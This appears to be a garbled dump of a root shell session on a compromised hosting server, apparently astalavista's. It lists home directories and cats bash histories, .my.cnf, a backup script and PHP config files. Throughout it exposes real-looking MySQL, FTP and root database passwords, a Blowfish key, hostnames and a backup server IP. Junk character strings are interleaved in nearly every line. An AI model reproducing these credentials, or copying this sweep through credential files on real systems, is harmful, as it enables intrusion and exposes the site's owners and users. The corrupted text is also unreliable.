8 P) n( P0 E0 M3 S) b) Y#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #5 p" {/ i X9 {1 G. v7 l
# |__| [__ | |__| | |__| | | | [__ | |__| #: r0 Z2 ^6 `6 X1 C8 F( i
# | | ___] | | | |___ | | \/ | ___] | | | #& b9 H5 e; u" K) M5 `+ n
# #7 t# G: u+ O+ }) v
#####################################################
3 S5 v* t6 f* D; |# #6 X! ~- T9 s2 n2 O9 P0 \4 v) @/ v
# Admin Contact - 链接标记support@secureservertech.com #
. m+ M0 m; T( C% |% m9 G# w+ ^% q# #
" y9 p7 O8 B; f, M1 V& X# V" Q# Available ShortCuts #
; f1 ]$ m( J8 `* y; V. F# #. z! E5 l4 v- ^* c# K
# nst - list active connections #
$ z( b8 t$ K& O( Z8 F" ~ A# ddos - shows how many times each ip is connected #" w& v. N- k$ c& E/ M
# ltr - restart the webserver #) x6 x* s& @+ P+ N2 [) o- L: |- r
# phpc - edit the php config file #! S5 T v4 S) B+ V
# htc - edit the webserver configuration file #
4 q; }, C6 I( ^# up - uptime #
A D# t4 i; d6 R* a# etd - edit the motd of the day file #4 R4 ?2 U, P. O" G0 l
# htr - start and restart apache if needed #) Q: Y: w- `' x- s6 Y
# syng - shows active SYN_RECV connections #9 h! z' @0 k7 n! s
# synd - syn flood blocker - “synd -h” for usage #
0 q# g& f! R' b- w9 `7 V#####################################################
1 O+ B6 r6 R7 |4 F5 t( t# NOTES: #
/ S6 {+ p; I8 B% ^# Last Upgrade - 12-08-2008 by JF #
& A1 H* ?2 d+ C* u; [# My.cnf/Mysql Optimization - 1-28-09 #
2 ]1 N" Y( U2 L2 O1 a8 \7 {/ M' a" Y# #
2 R' D; y7 l( G( Y" ]1 f* n. P8 H# # B9 K8 [* [$ k, s# ~, ~
# #' i2 x7 N0 _" d: Q7 P# y
#####################################################
7 \& }) w: u9 ~. T
w9 C/ P: c: d3 @; [sh-3.2# lastlog | grep -v Never/ L. i5 b4 R p' Y" f9 [
Username Port From Latest7 {6 n! K. m* o1 `8 @- B+ D' c7 J9 g3 j
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
8 w2 L' n' Q7 tadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
2 V( g: }5 r2 c8 W; E' T) b8 Mcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
+ g5 F1 T" v& M {5 Gastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009' y9 \. G7 F# q( {9 M9 h" X, z
/ h) |; _$ |1 `; T3 @9 z4 c3 w% v
sh-3.2# ls -la
% s# V0 y/ [, j4 ~& x$ b8 ttotal 453376+ N8 k4 \" D# y
drwxr-x— 15 root root 4096 Jun 4 08:40 .7 W' V) I8 J6 T& B. G5 Z
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
2 W. \- l! H+ ^0 @& v0 u" `-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
; e. K) A8 w3 D# ^-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
9 K+ v) t" b1 W8 | d-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
! E$ x* q5 c$ z7 X/ M) L0 X/ z7 l-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout l! q* V) K, P7 @
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
x: k% l# P; H( M, T-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc2 r' Q" U# M& E
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
# |+ ^, b+ m/ ]2 M4 |! q b-rw-r–r– 1 root root 1327 Nov 29 2007 cert. d" B! |" F/ v2 ?& _$ B6 t9 I: W/ o
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
% V7 T0 Q/ e0 k. p+ q" O5 b2 @drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
7 C6 S( v8 s7 g3 p. U-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
7 T. v+ ^( Y- |-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
) B4 g7 d A- V0 _. F( R: ?. }drwx—— 2 root root 4096 Oct 28 2007 .elinks
6 ^$ O+ y5 u7 ^% n8 B- r' k/ Idrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
9 W- O+ o3 Y) n$ J, Q-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2) F7 R" |& B) ~+ S3 p, g/ i+ W
-rw——- 1 root root 0 Apr 16 13:19 .history
' V/ v' P. r. C" B& y7 i-rw-r–r– 1 root root 16095 Sep 11 2007 install.log! o4 z3 N/ t9 \6 l+ W
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog/ ~% @( H% V: v) h
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
% ^7 R$ M$ e4 e+ C* w! M$ H" w9 c-rw——- 1 root root 35 Jun 2 14:23 .lesshst) c( h0 g4 a2 C
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
1 Y8 x. v2 S4 \drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec- z: x4 n" ]) k( T6 i& _. G
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz& E1 {% D5 J1 A! Y
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
( s3 Z) e8 d7 \' a F7 F( B-rwx—— 1 root root 760 Sep 18 2008 lp- E+ z, P& ?8 K9 @' |
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1+ g8 `+ o4 q3 g& C
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz& x& W2 d+ z. q9 J2 U* C8 G
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
" d& E5 O" `( r. A) W- Jdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
% W5 _' T) V/ S2 l B: v$ K0 u-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz" Q* t3 _ Q8 Z. y4 R
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.39 g' O( K1 B# w; l! A- I1 j2 N, B) [
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz* Z( k3 I6 E3 }
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh6 [1 x; L: m5 b t4 l
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
! Z4 h! I' w o2 X8 x+ O-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history8 x7 F. }8 `* ~/ c) J
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport/ d+ _, h9 t) ~
-rw——- 1 root root 41 May 20 2008 .mytop$ \! \+ ]& m& e3 u& @7 Q1 \
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
. h5 v' I( M$ A' } d2 S-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz2 P3 @' G7 k- G4 A% p! D& o
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
1 O, N& V, U7 @$ z-rw——- 1 root root 1462 Sep 21 2007 opt.php# ^- F+ p- o+ M& `2 u ~- f$ X+ k
-rw-r–r– 1 root root 3371 Sep 22 2007 p6 S% D" f: b% r2 W, E; Z' K; J
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
' V$ E" M* E& I! [-rw——- 1 root root 1024 Feb 3 21:32 .rnd) S! {- J3 Q) K$ O% c$ a
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
5 J3 `; R9 }5 @1 b& y4 j& {% ]( R) L-rw-r–r– 1 root root 887 Nov 28 2007 server.key9 n) W9 O6 ^( q
drwx—— 2 root root 4096 Oct 10 2008 .ssh
; s. n& R& q6 M5 r* \* b L% y. O-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
/ Z! Y4 ~9 q* N! T, ?3 g0 q: F-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc. F3 f% g9 o( F: N
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
+ t, p; j# E6 b" Y: f- X) Q* J-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
+ d5 c" r+ D, M& Idrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
7 {9 E8 r( F" x-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
3 C% q( C; a4 m2 A7 U3 E3 m adrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
0 t0 h0 r, c' ^" W: N-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2( e% H% I& i' x$ L# Z8 |1 G" G
-rw——- 1 root root 12997 May 16 2008 .viminfo
! X0 z$ e* ]. v. z4 d1 {" V6 S: l p) P [/ U
sh-3.2# cat .bash_history. C( B% g1 K8 s' H* g* b! i
[snip]" h2 F7 G2 W" m0 C
wget cp4sst.com/sstlinux.tar.gz
: ~6 i: L# @- v5 i/ L- ztar zxvf sstlinux.tar.gz
9 d4 C: A- m6 a: L1 H+ u% ycd linux-2.6.27.10
5 p+ h! `+ `% U$ E$ Rsh install.sh
6 c& |6 o# a) c! m2 @. Amake bzImage ; make modules ; make modules_install ; make install
! x6 z5 L+ A8 r& v* W8 r" K5 r# ]make clean
1 A7 d3 m" b5 vservice mysqld restart
, I. L+ N8 r9 N6 | ~ H. y[snip]+ [" u) H h1 G. A5 p5 [0 \" q
cd /usr/sbin/' A8 V% c1 p* [3 x0 F* A! V
chmod 4777 traceroute; @- Y+ j$ ^) Q0 p8 I
chmod 4777 ping
) f; l4 i1 M! v W7 j, utraceroute -I 链接标记[url]www.astalavista.ch[/url]- M9 C' }; ]" _7 T
[snip]
8 @- a4 f/ ^! q8 Jvi /etc/csf/csf.conf9 i7 e6 u5 ?# |4 N) ~5 Y) ^# D9 c
traceroute google.ch# U+ a/ h9 d7 \3 `) _$ W
service csf restart( z& s3 n9 J$ x* T
tracert google.ch. y# g, V. y0 L; s' n- Q0 Q
service csf restart9 B9 C0 c; o( [3 ?% l" ?0 q
traceroute 链接标记[url]www.google.ch[/url]
; }6 c* m0 G( W, ^tracert 链接标记[url]www.google.ch[/url]
; R$ {& } I, R* e: H+ v8 x0 `6 Xtraceroute 链接标记[url]www.google.ch[/url]1 m! T2 C$ q- P! \% A6 `3 M/ c
locate traceroute
( \7 }* ?( O4 Z$ x5 ~/ G; Wchown 4755 /bin/traceroute. k( U' j) D) |0 ?5 P
chown 4777 /bin/traceroute5 U3 p& @1 V E9 B
locate ping; L) `( t8 K. ?) e5 Y8 B
chown 4755 /bin/ping2 v% b& R" s4 V$ U
chown 4777 /bin/ping9 T# g+ @1 Q2 S% a. b
cd /bin/; i+ ]' }7 W: _8 v4 A* E
ls -ali | grep ping6 Z# H6 R5 A4 ~' f
chown root ping& F; J* R, K. e" c
chmod 4755 ping3 E# B+ h& E$ F; t/ s& l8 @
ls -ali | grep traceroute; `0 e) O1 Q, a7 C& y
chown root traceroute6 t& ^6 N9 Q3 v+ j9 P
chmod 4755 traceroute
; W/ H2 H# z. J2 mls -ali | grep traceroute
F B( }+ w( ^traceroute -I 链接标记[url]www.google.ch[/url]
3 a( B$ c5 W. f& O$ straceroute 链接标记[url]www.google.ch[/url]
) o1 A$ J0 X @: ywhois pmsantos.ch3 W0 }3 N& o) X0 m
[snip]
1 |; A1 P' E9 j8 _mysql -h com_contrexx2_live < /root/defaultp_ports.sql
- ?8 Q) o, R. o2 b8 \- y* Bmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
8 J( \+ {/ |0 J: s& T; f$ _mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
# ^" |& }, d$ N5 |) X) [5 X8 jmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
% z/ a7 ~( J0 \5 M$ B8 F6 \5 Wtop0 l' A+ F. h8 B \3 W" ~
ping ssth.ch" M5 A- _) p* [$ E
ping asdlkfaljgasd???ljg???lasj.ch
8 i% B2 `& x2 N1 K( Uping asdlkfaljgasdlasj.ch- _! z7 }2 q- ^
ping 链接标记[url]www.ssth.ch[/url]
1 A" T% \2 y; Q8 ?ping ssth.ch$ e( ]- V2 b$ V. W' n
nslookup 链接标记[url]www.google.ch[/url]
: N2 F; y( o, x; |nslookup 链接标记[url]www.ssth.ch[/url]
4 c; R( Z% b3 t5 |% O6 ~man nslookup
. i* S& I. I5 }ping 链接标记[url]www.google.ch[/url]# ]( ]( k$ P( Y
nslookup 链接标记[url]www.google.ch[/url]6 ]% @! F% a8 I6 \6 k6 p% y
nslookup 链接标记[url]www.google.ch[/url]+ ^& P3 C3 [) k9 G- x
nslookup salfjasdlf.ch
- S9 }' ~$ z, C- A* L9 A( V[snip]
2 J8 ^0 _( V) k' l' Oopenssl passwd -1 sadf; D8 z% i6 C+ W5 {
openssl passwd -1 5cZNHstdTy+ `, N5 B. n. _' K, d2 C3 x; R
mysql0 n1 f' C! s: |3 J: q% n/ G1 i
mysql
; x( s- T) r# A3 ?. Qlocate proftp& m0 f, ~) V* o9 j9 q: R: Q
vi /etc/proftpd.passwd
" ~( x& V1 u: G$ f: ^service proftpd restart
1 a$ A+ }+ E i* S/ dlocate proftpd.conf$ `1 }9 _* R/ X7 O' `. W9 n! J! ]
vi /etc/proftpd.conf
/ f: Q6 `3 n3 Lvi /etc/proftpd.passwd
8 f L. x1 l' Z6 ~4 Nservice proftpd restart" e; E2 m2 |: ^6 a; L
[snip]" h1 _- ?' k# @. e! I
/bin/sh /home/com/backup_system/backup.sh" R y4 L7 f0 k6 k6 o
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin4 D3 _- \0 g) P
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
; ~) ]' p$ C2 ^- fmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
! z+ L: t9 I. R' O/ lls -ali
2 _* K; w7 j# z8 |) lmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql9 j& U4 ]' f8 r3 b) Q8 H# L4 f% i, M
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql }" ?: M7 N0 v! U. Y$ u
crontab -l' E: K# X- {/ y' q. P% T
crontab -l* o3 v: @ n" {! S
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
$ E1 m2 y, i, I( e- X/home/com/public_html/modifications/cronjobs/exploits.sh ^8 [/ v' r# I
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]; l4 x; S" O) b, W0 u H: d- h
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
- b, @8 w$ m7 e* l$ [9 ~cd lsws-4.0.3
0 C+ U) H4 _% ~5 Q* Nsh install.sh( E% O' A, G- M( s! j1 b
uptime
1 D" f5 h2 I; \( a' m$ w0 C) ~, Whdparm -tt /dev/sda5 e7 U6 z7 l S" _2 N
iostat2 _' F5 }; N) i' p; @4 K
yum install iostat
* D' U* Q" U6 Y3 jiostat) k- j( V1 q. P) ?8 s
whereis iostat
: P6 B* g% ?( z( m+ |5 byjm clean all
. x" X* ]/ {; C! t/ O+ {yum clean all ; yum -y update
5 n7 k2 W6 E2 s1 U9 p5 h0 k2 O) ]iostat
: i9 z8 O* D/ byum install systat
9 o1 t% Y+ L8 D6 xrpm -qa | grep iostat) f2 j. w7 z5 L8 p
rpm -qa | grep sysstat
8 Z H* h. S# M0 d) q9 y' ?3 K$ c4 _rpm -qa | grep systat) ]* Q* |. p. l5 z) {8 X
dmesg -c
9 ?; `) v% h( ~1 Nsysctl -p
S) @$ ^ n: q- F: Buname -r }/ @ g' m1 B
cd /usr/src( U V- G. k; ^) K1 B/ B
wget nix101.com/kernels/sstlinux.tar.gz
3 U9 r( |! Y# C) q3 v# J, vshutdown -r now2 K; j; @2 B' O( g
nano -w /boot/grub/grub.conf
, g& }' L& l% Q
+ x, ?. C) ]" }9 C8 m6 z1 Vsh-3.2# cat .my.cnf& X, ], n$ p8 e
[client]
# C% Q2 @2 L2 E* F$ O* Fuser=da_admin
% t4 k; `8 Z$ F$ S; y- s; m5 ]6 S: c1 A lpassword=X9dctmRH& i/ d7 \7 g+ s& M7 O- b
2 l" F2 [$ @, Z% [' b0 Hsh-3.2# cat /home/com/backup_system/backup.sh9 U$ f o0 P" ?& W9 Q) `* ?- z
#!/bin/sh7 W a g) ^3 b; H. C/ r$ S
#####################################################################
, f! Z4 y& V! }. j# #, q0 Z" ] }! N% S
# incremental backup for astalavista.com #5 Z* c+ Y1 y L( T3 e# X# q% R
# #5 G' @; i- T( k* f
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
) s$ w4 Q* r, T; f, D7 E* N9 H# #" r# t/ g5 T1 f# U' k# l, a: W
#####################################################################
3 O% T$ ?' l6 T& t: A[snip]
6 q0 d3 Q% Z- D# O7 L2 a5 fPROG_DIR=”/home/com/backup_system”;5 t! T0 _: E- W; I
BACKUP_DIR=”/home/com/backups”;
/ }0 V: h! d `DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
2 V" @( Z: i+ }$ b# ftp for synology backup server
( @8 R t; V6 ?" j3 x5 wFTP_HOST=”212.254.194.163″;4 ~+ v/ h& K, E, B q
FTP_PORT=”21″;
6 Z+ t$ `9 [9 cFTP_USER=”astalavista.com”;) ^5 W7 z0 H% g% J% P
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;) \4 |) h: Q, ?( a
FTP_DIR=”/astalavista.com”;) ]" J. Q' y$ n0 J! c
# database
, S/ K5 B1 { p( i: T( G C, g. fDB_HOST=”localhost”;
/ o3 a9 Z9 {' @% w$ J RDB_USER=”contrexxuser2″;
" F- i4 \& g. Z4 \% R/ YDB_PASS=”0fEYNZgXz1pKe”;2 r: ?; v+ y! C. _2 u4 b
DB_DATABASE1=”com_contrexx2_live”;8 k4 K$ U! J6 i; e; C. V6 V
DB_DATABASE2=”com_contrexx2″; A0 d+ @0 z! i0 @
[snip]9 ^) v4 ^% I% e3 G& M) U7 n8 h
ftp -in $FTP_HOST $FTP_PORT <<EOF" {3 M( g* J$ U" T/ n: m
quote USER $FTP_USER
7 `: R! R8 f" K) dquote PASS $FTP_PASS
. b: l) G$ n# m( {1 q2 Q* xcd $FTP_DIR
5 @& O! h( q, p# m7 o" gput $DB_FULLNAME-SQL_Dump.tar
) m2 v: w9 u: F+ k1 bput $BACKUP_FULLNAME-Public_HTML.tar
# ^. W# A9 G. E$ oclose$ [( Z+ c2 P$ A7 `
bye
4 E! D9 G- y9 a5 uEOF: \! `8 _; K9 P/ k
5 ?, @ w% P: T& y2 e& \: a! _
sh-3.2# cd /home
( P: J0 A! T' R) H" ]) H/ _sh-3.2# ls -la) D% K. u+ n4 x
total 120
# k* ?2 ~" `0 B3 g2 W) Zdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .4 ` x2 l4 N& b( M
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
' l$ M9 B9 l2 M8 I% Qdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
! J' x1 J5 m X/ E-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
6 b* M! C- @3 `: J2 B# I-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
$ D. J/ P- n4 u+ m3 a. ]drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet9 s7 j8 e$ q8 J- ?8 U9 O
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup. w: n) h: U7 @7 H# L% l0 |
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161* C5 F: n# U. s0 a# ^! g! y: V4 Q: k
drwx–x–x 10 com com 4096 Apr 28 12:40 com, a9 u, d9 X6 p' Y- C f
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
" n+ m7 p1 M" ^2 Jdrwx—— 3 jon jon 4096 Sep 21 2007 jon
9 ~8 T% P$ r$ n3 U/ adrwx—— 2 root root 16384 Sep 11 2007 lost+found
+ N% V! I2 j" M* Z2 x. d; ~drwxr-xr-x 2 root root 4096 Sep 14 2007 my
( [" b7 K6 @) E7 }/ Z9 c3 f: Gdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
% _5 h4 d8 x; T2 S9 y* P" ddrwx—— 2 jon jon 4096 Sep 15 2007 test
- O1 H5 p/ q- p1 Z& @4 o5 _9 `) Odrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
) m1 A6 R6 x. _8 h( V* S( R8 S. c' q) S3 X6 U1 _, _
sh-3.2# cd admin2 d2 x) h$ F( V1 w
sh-3.2# ls -la
) K) _% N% R% `% mtotal 1735896' T" }5 C7 b3 v$ |6 w8 a
drwx–x–x 9 admin admin 4096 Nov 28 2007 .8 K( J8 c; ]" a7 @
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
1 f2 H0 V& s5 jdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
2 E$ j, y6 n! A# T- O) \$ l9 J4 ]" odrwx—— 2 admin admin 4096 Sep 28 2007 backups
8 Z% F, _, G- j; x) R-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
$ e7 N- t% m4 _1 ~8 i-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
3 c, L# Z/ m. {1 x9 r* \% C-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile6 y: f, G1 E8 ?, e
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc% ~" D' B' K6 o
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
) G/ v. H1 ~( v" ~4 z7 B% A# |drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
* |! y4 Y0 P) c) m* u' E) sdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap6 S* k v, m6 n; w
-rw-r–r– 1 root root 24 Sep 21 2007 info.php" W$ U' C w, N
drwx—— 2 admin admin 4096 Sep 21 2007 mail
% l! s& h3 [' M- L) b$ O) l-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
9 V: F: D. o# s-rw-r–r– 1 root root 887 Nov 28 2007 server.key
1 d" C) m1 c2 X-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow$ O/ ?$ s9 L" c4 e" w
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
2 |; ^! T: v' Qdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
; a, U. [/ B4 M* u( @& E$ H0 }1 j2 ?8 ?1 x; `; }
sh-3.2# ..
7 J9 _, y( B! K; Z$ hsh-3.2# cd jon0 M- h' |4 h# D4 a4 Y, D7 w, I
sh-3.2# ls -la
" m U% S, _7 F e" M( Q% D& Ktotal 36! W% |3 J5 R- {- n- Y8 U* ]- F
drwx—— 3 jon jon 4096 Sep 21 2007 .2 a$ C1 m; v( u) {; c6 a
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .., ?" a) Y$ b5 _0 {: {5 j/ {0 y
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
7 {$ X3 \/ D7 } C7 ?! K-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout5 N3 _4 c& v! I" X9 j
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
- l7 q! H/ c8 p- H-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
/ }6 ~& `1 G& i j4 x-rw-r–r– 1 root root 24 Sep 21 2007 info.php
) }' t+ v+ e5 l9 ndrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
- l, u$ U$ p# v2 E9 G6 e, M/ F; j, c0 s5 ?6 p% Z* Z
sh-3.2# cd ..' w8 L: _) J! g. M4 c/ E+ b
sh-3.2# cd test2 ]" `0 K0 V' J- w8 B4 }) \ ]
sh-3.2# ls -la- I/ J" @, [. Y' m) Q
total 48) j* }, F y5 k3 K1 x& I0 ?9 l9 C. L
drwx—— 2 jon jon 4096 Sep 15 2007 .' V, e1 l6 O6 X# b; R1 H! F [
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ../ A9 o/ v% I+ t1 r
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
+ }1 {+ k9 `" J: |/ ^-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
7 o* u" _ G1 ^ L S- @+ N& D-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile' X7 m7 M8 T' T
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc. r8 U& D" ]; u/ Q/ } W8 q! @
sh-3.2# cat .bash_history W; s1 Q! B0 b/ e
/usr/bin/mysqladmin -u root password PoliuJhytg67
& ^+ }5 K* I+ K e9 a+ r; x2 N2 c# L* t- `3 ^; s& L" x
sh-3.2# cd ..
7 q" S1 t" F& |7 Q0 M3 k: _# Ash-3.2# cd astanet
* r6 ?/ N2 J1 F' X! _sh-3.2# ls -la
5 k1 I) s! V0 stotal 52
1 }/ m2 f, ?3 kdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
, C' G F% x! udrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..' G+ c6 U, A$ l& L/ \, A Q
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth) V/ c/ r8 z% J' T8 l
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
6 K& S5 |. i4 k: u5 A-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout9 Y% L* d, [- J3 ~
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
" a% T4 |7 H3 g" f' A-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
. P# B4 {* h; r! N$ j5 ?drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
( H$ c. h& U$ W6 C( Q Y( T3 O) r4 Qdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap% Y- E4 s, m6 ?8 n
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail, g# _8 x) `# M
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
4 O" F6 e& w5 J' s3 M! O' Llrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html! I2 k2 s$ T [- [* J
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow! `9 X1 ~3 W, B
" B' J3 a% a. G" Vsh-3.2# cd auth/
2 t) C3 J) q# C6 X$ |5 v. Fsh-3.2# ls -la5 q% q3 V' ^* S* Z s& Z4 y
total 28; H" P9 }: O: e; u1 D. q+ p1 T- g
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .# w4 r0 g' [1 u: g
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
) I7 _' Q4 k/ c+ w l/ j' h. B5 A7 X-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
; h7 ?" P- d2 {. t-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
: ~. \6 ]8 ~2 @" z1 N-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd9 @9 w, \- F# s# z. a
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting6 t: K6 l8 R' ` I$ t
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd: L$ Z" e; ]# L# G
+ b6 V* ~/ K0 q+ [2 @* [
sh-3.2# cat hackercontest.config.inc.php$ B; g, Z' h" Z) Q
<?PHP
$ ?/ Y. j) j# b0 K/ J7 D* h3 _// Variabeln f?r Verbindung zur Datenbank //
" i0 _1 P8 k6 ?* x$conxHost = ‘localhost’; // MySQL hostname
+ y1 g- Y$ C+ Z$conxUser = ‘hackercontest’; // MySQL user
, F Q# {1 @0 ?0 C$conxPassword = ‘K6m@7dUc’; // MySQL password
; S! I" O8 V5 j) K+ c$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
4 m8 ` H4 f3 c8 l- G?>2 w* |3 F$ k* @# F2 I7 m/ A
sh-3.2# cat hosting.config.inc.php9 h. K& b- S; Q* W" k
<?PHP; b( \% U. a' m8 W. F
// Variabeln f?r Verbindung zur Datenbank //1 X! A6 I1 H! E2 P
$conxHost = ‘localhost’; // MySQL hostname
- v0 S/ W2 l; C/ [7 u. v$conxUser = ‘hostinguser’; // MySQL user
6 R7 ]( J) i" _( p/ F$conxPassword = ‘cXvB3981′; // MySQL password% E- L, j! h; P: C% }8 {
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
5 F; e$ S; ~; b( v- @" w- j?>
) F- \6 W* |0 F1 \) i3 ?5 j7 w
& b) ^/ ]7 f0 m8 c1 o* Jsh-3.2# cd ..
3 H/ C8 g1 f) I2 a" A# L/ Y" \sh-3.2# cd com1 D' \; A! _" \9 R) B
sh-3.2# ls -la
3 o' o; }. x4 E( _0 x& f/ Ltotal 141208
$ ?5 p1 G4 Z# `' q, D. _, W4 adrwx–x–x 10 com com 4096 Apr 28 12:40 ./ B0 N# A# F9 m8 S! ]- ~
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- ~# L) L1 ?, v" k" L" l! B% Bdrwx—— 2 com com 4096 Jun 4 04:04 backups8 K( y# }- Y7 c
